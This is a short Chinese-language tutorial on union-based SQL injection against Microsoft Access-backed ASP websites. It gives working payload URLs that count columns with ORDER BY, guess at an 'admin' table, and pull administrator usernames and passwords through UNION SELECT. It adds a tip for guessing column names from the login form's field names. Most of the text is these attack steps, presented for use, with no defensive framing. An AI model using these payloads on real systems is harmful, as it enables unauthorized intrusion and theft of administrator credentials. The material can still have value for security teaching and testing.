SQL注入之access数据联合查询

access数据联合查询：

access一般用于个人或小型公司。
mssql一般用于edu，gov等政府机关
mysql一般用于中小企业
orcal一般用于大型企业

access数据结构：表名，列名，内容，一般存在管理员表admin

首先要查找网站传参的位置，access数据库渗透过程中表名列名都是靠猜的。
例子：
1.http://192.168.1.1/news.asp?id=155 order by 2正常，3错误的话，即可判定字段数为2。
2.http://192.168.1.1/news.asp?id=155 union select 1,2 from admin(猜的) 显示正常页面既表示存在admin表，返回不正常页面表示不存在。
3.http://192.168.1.1/news.asp?id=155 union select username,password from admin，列名也是靠猜的，猜对的话会在对应的回显位显示出对应的用户名密码

小技巧：在找不到admin表中的列名的时候可以尝试找后台查看源代码，input表单中的name值一般就是管理员的列名。